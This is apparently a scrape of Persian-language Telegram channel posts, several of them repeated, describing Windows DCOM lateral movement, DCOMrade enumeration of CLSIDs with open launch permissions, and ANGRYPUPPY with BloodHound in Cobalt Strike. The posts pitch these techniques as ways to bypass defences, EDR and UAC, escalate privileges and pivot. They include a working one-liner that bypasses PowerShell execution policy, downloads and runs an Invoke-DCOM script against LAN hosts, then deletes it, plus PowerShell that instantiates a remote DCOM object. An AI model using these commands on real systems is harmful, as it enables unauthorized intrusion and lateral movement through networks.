#DCOM #Lateral_Movement
استفاده از #DCOM Object های مختلف که در سیستم عامل های ویندوز میتواند تعریف و بکار گرفته شود و امکان خوبی برای دور زدن مکانیزم های دفاعی بدهد، چرا که هر کدام از این #DCOM ها میتوانند بستر غیر مستقیمی برای داده هایی باشند که برای آنها ساخته شده اند, برای مثال ExcelDDE که در خصوص #DDE که در فایل فرمت Excel میتواند بکار گرفته شود,
# Open cmd (Administrator)
C:\Users\unk9vvn>
@Unk9vvN
استفاده از #DCOM Object های مختلف که در سیستم عامل های ویندوز میتواند تعریف و بکار گرفته شود و امکان خوبی برای دور زدن مکانیزم های دفاعی بدهد، چرا که هر کدام از این #DCOM ها میتوانند بستر غیر مستقیمی برای داده هایی باشند که برای آنها ساخته شده اند, برای مثال ExcelDDE که در خصوص #DDE که در فایل فرمت Excel میتواند بکار گرفته شود,
# Open cmd (Administrator)
C:\Users\unk9vvn>
%comspec% /K powershell.exe -ExecutionPolicy Bypass -NoExit -Command "$LAN = Get-NetIPAddress | Where-Object -FilterScript { $_.ValidLifetime -Lt ([TimeSpan]::FromDays(1)) } | Select-Object -Property IPAddress; Invoke-WebRequest -Uri https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1 -OutFile %temp%\Invoke-DCOM.ps1; cd %temp%; Import-Module .\Invoke-DCOM.ps1; Invoke-DCOM -ComputerName $LAN.IPAddress -Method MMC20.Application -Command 'calc.exe'; Remove-Item %temp%\Invoke-DCOM.ps1; exit"
https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1@Unk9vvN
This media is not supported in your browser
VIEW IN TELEGRAM
#Enumerating Vulnerable #DCOM Applications #DCOMrade
با استفاده از DCOMrade شما میتونید از راه دور به دیوایس ویندوزی خود وصل شده و یک سرشماری بر روی AppID ها انجام داده تا CLSID هایی که پرمیژن LaunchPermission باز دارند رو پیدا کنید, تا از آن که البته بصورت پیشفرض وجود داره و این موضوع دو امکان رو به هکر میتونه بده,
یک اینکه شما میتونید برای Lateral Movement انجام دادن استفاده کنید که میتونه باعث دور زدن رفتار شناسی پایلودها به وسیله #EDR ها و غیره است, دوم اینکه میتوان با استفاده از این پرمیژن مکانیزم هایی مانند #UAC و برای #Privilege_Escalation انجام داد, حتی در مواقعی میتوان از این Security Misconfiguration در سرورهای آسیب پذیر میتوان برای Pivot زدن در شبکه هم استفاده کرد,روش استخراج اطلاعات
unk9vvn@avi:~$
https://github.com/sud0woodo/DCOMrade
@Unk9vvN
با استفاده از DCOMrade شما میتونید از راه دور به دیوایس ویندوزی خود وصل شده و یک سرشماری بر روی AppID ها انجام داده تا CLSID هایی که پرمیژن LaunchPermission باز دارند رو پیدا کنید, تا از آن که البته بصورت پیشفرض وجود داره و این موضوع دو امکان رو به هکر میتونه بده,
یک اینکه شما میتونید برای Lateral Movement انجام دادن استفاده کنید که میتونه باعث دور زدن رفتار شناسی پایلودها به وسیله #EDR ها و غیره است, دوم اینکه میتوان با استفاده از این پرمیژن مکانیزم هایی مانند #UAC و برای #Privilege_Escalation انجام داد, حتی در مواقعی میتوان از این Security Misconfiguration در سرورهای آسیب پذیر میتوان برای Pivot زدن در شبکه هم استفاده کرد,روش استخراج اطلاعات
unk9vvn@avi:~$
pwsh
PS /home/unk9vvn> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39', "192.168.99.13")
PS /home/unk9vvn> $obj = [System.Activator]::CreateInstance($com)
PS /home/unk9vvn> $item = $obj.Item()
PS /home/unk9vvn> $item
... ...https://github.com/sud0woodo/DCOMrade
@Unk9vvN
Media is too big
VIEW IN TELEGRAM
#ANGRYPUPPY #BloodHound Attack Automation in #Cobalt_Strike
همونطور که میدونید یک Tools بسیار محبوب در حوزه استخراج اطلاعات یک #ActiveDirectory فعال وجود داره به اسم #BloodHound که در این دمو توضیح داده میشه که با استفاده از یک Tools دیگه امکان اینو پیدا میکنیم که با اطلاعاتی که BloodHound برای ما استخراج میکنه از کاربران اون DMZ عملیات Pivot زدن به اونهارو راحت تر کرده و به نوعی #Lateral_Movement بین سیستمی انجام دهیم,
اما این Lateral_Movement بر بستر کدامین #COM یا #DCOM_Object ها پیاده سازی میشه؟ همونطور که سازنده محصول #ANGRYPUPPY توضیح داده این ابزار با استفاده از اطلاعاتی که BloodHound در اختیارش قرار میده میتونه بر روی
https://github.com/vysecurity/ANGRYPUPPY
https://github.com/BloodHoundAD/BloodHound
@Unk9vvN
همونطور که میدونید یک Tools بسیار محبوب در حوزه استخراج اطلاعات یک #ActiveDirectory فعال وجود داره به اسم #BloodHound که در این دمو توضیح داده میشه که با استفاده از یک Tools دیگه امکان اینو پیدا میکنیم که با اطلاعاتی که BloodHound برای ما استخراج میکنه از کاربران اون DMZ عملیات Pivot زدن به اونهارو راحت تر کرده و به نوعی #Lateral_Movement بین سیستمی انجام دهیم,
اما این Lateral_Movement بر بستر کدامین #COM یا #DCOM_Object ها پیاده سازی میشه؟ همونطور که سازنده محصول #ANGRYPUPPY توضیح داده این ابزار با استفاده از اطلاعاتی که BloodHound در اختیارش قرار میده میتونه بر روی
psexec, psexec_psh, wmi, winrm
پیلود اجرا کرده و دسترسی سیستم عامل Parent رو برای ما حاصل کنه...https://github.com/vysecurity/ANGRYPUPPY
https://github.com/BloodHoundAD/BloodHound
@Unk9vvN